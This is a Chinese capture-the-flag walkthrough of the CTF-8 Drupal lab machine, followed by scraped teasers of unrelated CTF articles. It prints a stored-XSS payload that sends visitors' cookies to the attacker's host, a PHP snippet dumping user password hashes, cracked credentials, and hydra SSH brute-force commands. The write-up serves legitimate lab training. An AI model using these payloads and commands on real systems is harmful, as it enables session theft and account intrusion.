CTF-8 靶场夺旗

2023-11-05

兵无常势,水无常形,能因敌而致胜者,谓之神

环境准备

VMware Workstation Pro12
Kali Linux (IP10.10.16.128CTF-8 虚拟机
NAT 网络连接

1. 主机发现

fping -asg 10.10.16.0/24

在这里插入图片描述
访问靶机 http://10.10.16.138
在这里插入图片描述
查看源代码,发现 flag
在这里插入图片描述

2. 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.138

在这里插入图片描述

3. 目录爆破

dirb http://10.10.16.138

在这里插入图片描述
所有用户都有一个ID(第一个是管理)。

http://10.10.16.138/user/1

在这里插入图片描述
所有页面都有一个ID(隐藏页有28个),访问第28个得到 flag

http://10.10.16.138/node/28

在这里插入图片描述
访问 robot.txt 和 phpinfo.php 分别得到两个 flag 。
在这里插入图片描述
在这里插入图片描述
浏览页面之后有一个 content 目录没能被扫出来,于是使用 dirb 再对目录爆破一遍,发现一个 hidden 文件,访问之后发现和前面 http://10.10.16.138/node/28 是同样的页面

dirb http://10.10.16.138/content

在这里插入图片描述

4. 漏洞挖掘

在首页文章下面的评论区插入 XSS 测试代码,再次访问这篇文章的时候就会触发 XSS 代码,出现如下弹框,说明此处存在 XSS 漏洞。
在这里插入图片描述
在这里插入图片描述

5. 漏洞利用

注册一个账户 zhutou ,然后以注册的账户登录,在评论区插入如下代码

<script>
var request=new XMLHttpRequest();
var redirect_url="http://10.10.16.128:4444/"+document.cookie;
request.open("GET",redirect_url);
request.send();
</script>

在这里插入图片描述
该脚本旨在获取访问该文章的用户的 session_id ,特别是本文作者 Barbara 的 session_id,所以,关键的一步还是要给作者留言,让他再次去访问这篇文章
在这里插入图片描述
在 Kali 快速搭建一个 http 服务,提供一个文件浏览的 web 服务(ctrl+c 关闭,不要使用 ctrl+z,那是停止,还没关闭端口,如果下次使用就会报错,提示端口被占用)
在这里插入图片描述
10.10.16.138 那一行就是 admin 的访问记录,带上管理员的 cookie 访问首页,发现用户变成了 steve
在这里插入图片描述
之后左上角选择再添加文章,在 Body 处添加如下脚本。

<?php
$result = db_query('select name,pass from users');
while($record = db_fetch_object($result))
{
print $record->name . ":" . $record->pass . "<br/>";
}
?>

在这里插入图片描述
关键的一步是在 input format 中选择 PHP code
在这里插入图片描述
同样,每操作一步都要使用 Steve 的 cookie ,不然会自动换成普通用户的 cookie。
在这里插入图片描述
在这里插入图片描述
密码重复使用是当今一个经常出现的问题。如果我们能破解这些散列我们可以重新使用相同的密码来获得对目标系统的 shell 访问。Drupal 使用 MD5 算法保存密码散列,该算法不是很强。我们也许可以使用暴力强制这些散列或使用字典查找某些值。

john -w=/usr/share/wordlists/rockyou.txt -form=raw-md5 zhutou.txt 

在这里插入图片描述
在这里插入图片描述
一个个去线上破解

admin:49265c16d1dff8acef3499bd889299d6(football123)
Barbara:bed128365216c019988915ed3add75fb(passw0rd)
Jim:2a5de0f53b1317f7e36afcdb6b5202a4(letmein!)
Steve:08d15a4aef553492d8971cdd5198f314(drupal)
Sherry:c3319d1016a802db86653bcfab871f4f(1website)
Gene:9b9e4bbd988954028a44710a50982576
Harvey:7d29975b78825ea7c27f5c0281ea2fa4
John:518462cd3292a67c755521c1fb50c909(4summer13)
Johnathan:6dc523ebd2379d96cc0af32e2d224db0(1loveU)
Susan:0d42223010b69cab86634bc359ed870b(BobMarley)
Dan:8f75ad3f04fc42f07c95e2f3d0ec3503(BaseballSeason)
George:ed2b1f468c5f915f3f1cf75d7068baae(12341234)
Jeff:ca594f739e257245f2be69eb546c1c04(sitepass)
Stacey:85aca385eb555fb6a36a62915ddd8bc7(Seventy70)
Juan:573152cc51de19df50e90b0e557db7fe(swanson)
Michael:c7a4476fc64b75ead800da9ea2b7d072(cherry)
Jerome:42248d4cb640a3fb5836571e254aee2b
Tom:971dcf53e88e9268714d9d504753d347(drupalpassword)
Xavier:3005d829eb819341357bfddf541c175b(thundercats)
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2(fantasy)
zhutou:a6b3342afdf0d87ce6d2ae8af29069e7

将以上的用户名对应的账号和密码分别保存在文本里。根据前面提到的,每一个用户在 user 目录下对应一个 ID ,用户名对应的账号查找如下:
在这里插入图片描述
使用 hydra(九头蛇)/medusa(美杜莎)进行 ssh 登录爆破。

hydra -L user.txt -P passwd.txt -t 10 ssh://10.10.16.138

在这里插入图片描述
使用第一个帐密登录得到两个 flag 并成功提权。
在这里插入图片描述
进入家目录,查看其他用户,在其他用户目录下都发现了 flag 。
在这里插入图片描述

                                                                                                                        猪头 
                                                                                                                     2020.2.23
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

CTF-8 靶场夺旗 的相关文章

  • BUUCTF Crypto(密码学)刷题

    MD5 拿到一串字符串e00cf25ad42683b3df678c61f42c6bda 根据题目可到在线MD5在线解密 拿到flag Url编码 根据提示可知是url编码 url编码在线解密 一眼就解密 的确 一眼就解密了 非常明显的bes
  • 攻防世界-re-for-50-plz-50

    1 下载附件 exeinfo查壳 无壳 2 32位IDA分析 主函数分析 在注释里 31的来源 python和C语言 a cbtcqLUBChERV Nh X D X YPV CJ print len a include
  • 虚拟机内搭建CTFd平台搭建及CTF题库部署,局域网内机器可以访问

    一 虚拟机环境搭建 1 安装docker git docker compose ubuntu sudo apt get update 更新系统 sudo apt get y install docker io 安装docker sudo a
  • 一些文件头

    由这些文件头即使文件后缀被乱改也可以通过查看二进制文件查出文件的匹配格式 当然这就是一些播放器识别文件的方法 1 从Ultra edit 32中提取出来的 JPEG jpg 文件头 FFD8FF PNG png 文件头 89504E47 G
  • buuctf [强网杯 2019]随便注 1

    buuctf web 强网杯 2019 随便注 1 刷题个人日记 小白一个 写给自己看 打开后是这样 从题目和内容来看就是一道sql注入题 输入 1 or 1 1 这个 用来注释掉后面的sql语句 显示所有数据 这个数据有什么用我也不知道
  • upload-labs:pass-10

    is upload false msg null if isset POST submit if file exists UPLOAD PATH deny ext array php php5 php4 php3 php2 html htm
  • ctfshow_web149

    打开容器
  • Bugku题目MISC部分(持续更新)

    目录 telnet 1和0的故事 这是一张单纯的图片 隐写 社工 进阶收集 来自论坛提问 gQiRf的附件 zip 简单取证1 mimikatz PasswareKitForensic工具 眼见非实 啊哒 ping FileStoraged
  • SAR: 1 4 https://www.vulnhub.com/entry/sar-1%2C425/

    SAR 1 About Release Back to the Top Name Sar 1 Date release 15 Feb 2020 Author Love Series Sar Download Back to the Top
  • 攻防世界(easy-apk)

    下载链接如下所示 https adworld xctf org cn media task attachments 989ca07c3f90426fa05406e4369901ff apk 使用JEB打开apk 如下所示 可知获得输入后进行
  • [MRCTF2020]千层套路

    MRCTF2020 千层套路 题目地址 https buuoj cn challenges MRCTF2020 E5 8D 83 E5 B1 82 E5 A5 97 E8 B7 AF 解压压缩包 发现是密码竟然是压缩包名称 再根据题目 tn
  • buuctf - crypto - Rabbit

    rabbit 加解密 在线Rabbit加密 Rabbit解密 在线工具
  • CTF BugKu平台——Crypto篇刷题记录(后续更新)

    CTF BugKu平台 Crypto篇 前言 抄错的字符 聪明的小羊 ok lt gt 把猪困在猪圈里 你喜欢下棋吗 小山丘的秘密 EN 气泡 你以为是md5吗 Math English easy crypto 黄道十二官 一段新闻 7 1
  • 强网杯 2019]随便注 【SQL注入】四种解法

    题目简介 题目名称 强网杯 2019 随便注 1 题目平台 BUUCTF 题目类型 Web 考察知识点 SQL注入 解题步骤 方法一 首先启动并访问靶机 有一个输入框 随便输入1 or 1 1 测试一下是否存在sql注入 提交后提示erro
  • disabled_button 攻防世界

    1 第一步还是看题目 重要知识点 按钮按不下去 前端知识 例如下面的代码
  • 全国大学生信息安全竞赛真题(CTF)

    web篇 https blog csdn net csu vc article details 78011716 https www cnblogs com iamstudy articles 2017 quanguo ctf web wr
  • Bugku题目Reverse逆向部分wp(持续更新)

    目录 入门逆向 Easy Re 游戏过关 sign in Easy vb Next 入门逆向 题目链接 丢入DIE PEID看过 没有壳 32位 直接IDA 汇编代码直接看到 flag Re 1s S0 C0OL Easy Re 题目链接
  • [NCTF2019]Fake XML cookbook

    NCTF2019 Fake XML cookbook 日常刷题 打开题目嗯 一开始我的脑子里想到的是禁止自娱自乐 狗头 哈哈 第一想法就是试一下admin 别问为什么 web狗的自觉 果然没这么容易 抓包 将提交的数据放到了doLogin
  • [ISCTF 2023]——Web、Misc较全详细Writeup、Re、Crypto部分Writeup

    前言 由于懒我直接把上交的wp稍加修改拉上来了 凑活看 文章目录 前言 Pwn test nc nc shell Reverse Creakme EasyRe
  • BugKu-Web-滑稽

    题目环境 持续的动态图片 F12审查元素 拿下flag flag 595d994a34342417bfc3a3c3a23e0a48

随机推荐

  • csharp:Dapper Sample

    You can find Dapper on Google Code here http code google com p dapper dot net and the GitHub distro here https github co
  • Redis集群的那些谜

    下列问题是我在搭建Redis集群之前与实验过程发出的疑问 随着我Redis集群的成功搭建 疑问也一个一个解开 Redis集群搭建参考资料 Redis Cluster参考资料 Redis集群的数据互通吗 先说结论 互通的 往Redis集群里存
  • hualinux dj3 2.6:drf ViewSets使用@action添加路由及传参

    目录 一 viewSets active修饰器介绍 1 1 介绍 1 2 用法 二 例子 2 1 需求 2 2 分析 2 2 1 action自定义路由 2 2 2 action url path不支持尖括号传参问题 2 3 实现代码 2
  • 杂项记录

    2019 07 14 查看一些基础的信息 比如CPU 逻辑核等系你 查看某个网卡在哪个numa节点上https blog csdn net jpmsdn article details 84561294 DPDK最大支持核数 128 在rt
  • cmake安装更新(解决cmake报错:CMake 3.8 or higher is required. You are running version 3.5.1)

    ubuntu16 04在安装libfreenect过程中 出现cmake报错 CMake 3 8 or higher is required You are running version 3 5 1 cmake3 5 1是在安装ubunt
  • Linux查看用户UID和所属组

    使用以下命令查看 id 用户名 如省略用户名代表查看当前用户的
  • SQL注入1——显注(重学)

    SQL注入 学习自 文章 201 A3 SQL注入 上 视频 农夫安全201 A3 sql注入技巧上2 SQL注入 SQL注入 前言 一 显注 1 判断 2 判断字段数量 3 获取数据库信息 4 获取表信息 5 获取列信息 6 获取表信息
  • 配置虚拟机,查看主机cpu个数

    打开 任务管理器 性能 资源监视器 CPU 即可查看 根据自身cpu个数不同分配虚拟机处理器个数 我这里是有8个cpu
  • LeetCode 高级 - 矩阵中的最长递增路径

    矩阵中的最长递增路径 给定一个整数矩阵 找出最长递增路径的长度 对于每个单元格 你可以往上 下 左 右四个方向移动 你不能在对角线方向上移动或移动到边界外 即不允许环绕 示例 1 输入 nums 9 9 4 6 6 8 2 1 1 输出 4
  • Idea+git push时候出现HTTP 413 错误

    Delta compression using up to 4 threads Compressing objects 100 2364 2364 done Writing objects 100 4329 4329 1 15 MiB 11
  • 【java】计算员工工资

    案例介绍 任务描述 某公司有多个部门 员工信息包含姓名 name 类型 type 部门 department 和底薪 basicSalary 其中员工的类型有三种 管理员 销售员和工人 公司财务部门工作人员每月要计算员工的实发工资 实发工资
  • Windows端高仿超级逼真Mac系统方法

    简介 MyDock是一款完全免费的高仿Mac桌面的主题软件 软件仿造Mac系统桌面高达95 以上的相似度 不管是主题样式 界面 功能 操作方式 都达到了仿造Mac系统的效果 Mac系统有的功能 这里基本上都有 如Dock图标的鱼眼放大效果
  • idea显示连接https://start.spring.io连接问题

    表示尴尬 jar包没有打出来 还给我弄了个错误 用spring initializr方式创建一个spring boot项目给我来个 当时就懵逼了 在网上看到说吧https改成http 看了好几种方式 但对我有用的是在idea里的settin
  • flex写Java词法分析_如何用flex+bison写语法分析器

    背景 这个星期 项目中要使用C 或C语言解析JSON格式的数据 把解析的结果放到一个通用的数据结构 这个通用的数据结构 实际上是作为web服务层 这一层大家可以认为是类似于PHP服务器或webpy的服务器容器 到web页面层 这一层是语法类
  • Java使用list集合remove需要注意的事项

    在实际开发中有时候会碰到这样的场景 需要将一个list集合中的某些特定的元素给删除掉 这个时候用可以用List提供的remove方法来实现需求 List中的remove方法传入的参数可以是集合的下标 也可以是集合中一个元素 也可以是一个集合
  • 我的专业我做主ppt计算机,我的专业我做主(会计专业入门知识).ppt

    我的专业我做主 会计专业入门知识 ppt 由会员分享 可在线阅读 更多相关 我的专业我做主 会计专业入门知识 ppt 13页珍藏版 请在装配图网上搜索 1 会计学原理 姓名 池泽周 学院 经济管理学院 班级 会计092班 会计学原理是会计学
  • 对于制造业来说,MES上线前后有哪些变化?

    对于制造业来说 MES软件系统未上线前的现状 具体如下 1 目前 制造业产品的批次记录仍然是手工录入 并且每批都需要去打印 除此之外 生产过程中的投料量计算结果 产品测试的申请单 月生产计划表 产品所需浓度的计算都需要人工填写 不仅需要耗费
  • python包管理-pip

    镜像列表 官方 已默认添加 豆瓣 清华大学 中国科技大学 阿里 网易镜像 腾讯镜像 华为镜像 北京外国语大学 哈尔滨工业大学 百度 https pypi python org simple http pypi doubanio com si
  • 基于爱奇艺HCDN视频分发网络的开放缓存

    为通过Internet向海量用户传输高清晰度 高码率的视频节目 爱奇艺融合CDN和P2P技术 开发出一套适合多终端的混合分发传输网络 HCDN 本文来自爱奇艺高级技术总监庹虎在LiveVideoStackCon 2018大会中的演讲 由Li
  • CTF-8 靶场夺旗

    兵无常势 水无常形 能因敌而致胜者 谓之神 环境准备 VMware Workstation Pro12 Kali Linux IP 10 10 16 128 CTF 8 虚拟机 NAT 网络连接 1 主机发现 fping asg 10 10